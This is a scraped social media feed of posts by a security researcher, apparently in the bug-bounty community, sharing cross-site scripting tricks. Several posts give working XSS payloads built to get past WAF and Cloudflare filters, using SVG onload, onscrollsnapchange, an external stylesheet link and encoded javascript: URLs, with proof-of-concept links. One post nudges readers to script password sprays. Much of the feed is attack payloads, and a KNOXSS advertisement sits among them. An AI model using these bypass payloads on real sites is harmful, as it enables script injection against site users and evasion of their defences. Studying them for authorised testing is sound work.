6 days ago
0
0
0
0
Posts by BRute Logic
This might trick some #XSS filters out there, including CloudFlare's.
<Svg OnLoad="alert//>%0A(1)"
11 months ago
1
0
0
0
#BlackFriday
KNOXSS is up to 50% OFF
Check it out!
knoxss.me/?page_id=1974
#XSS #BugBounty #PenTesting
1 year ago
1
0
0
0
If you learn a #hacking technique but can't make it work, it's because you understand the example, not the technique.
1 year ago
2
0
0
0
Nice work in the original payload below.
Although "style=" (and "<link") being easily caught by most cloud WAFs I've seen out there, I've just made it shorter and "bypass friendly".
<p><dd onscrollsnapchange=alert(1)>
<link href=//X55.is/k rel=stylesheet>
PoC: brutelogic.com.br/xss.php?a=%3...
1 year ago
2
1
0
0
brutelogic.com.br/blog/buildin...
1 year ago
1
0
0
0
Some neat #XSS tricks to #Bypass #WAF in URL Context
=> HTMLi + Double Encoding + Embedded bytes
JavaScript:"<Svg/OnLoad=alert%25%0A26lpar;1)>"
=> + Octal Encoding
JavaScript:"\%0A74Svg/On%0ALoad=alert%25%0A26lpar;1%25%0A26rpar;>"
Lab: brutelogic.com.br/dom/sinks.ht...
1 year ago
4
0
0
0
I’m so happy to see all my old twitter friends and no nefarious billionaires!!
1 year ago
44913
2202
1023
74
Advertisement
Thank you, appreciate it.
1 year ago
1
0
0
0
<XSS OnBlueSky=import(X)>
1 year ago
4
0
1
0
#PenTesting?
Script your Password Spray.
1 year ago
1
0
0
0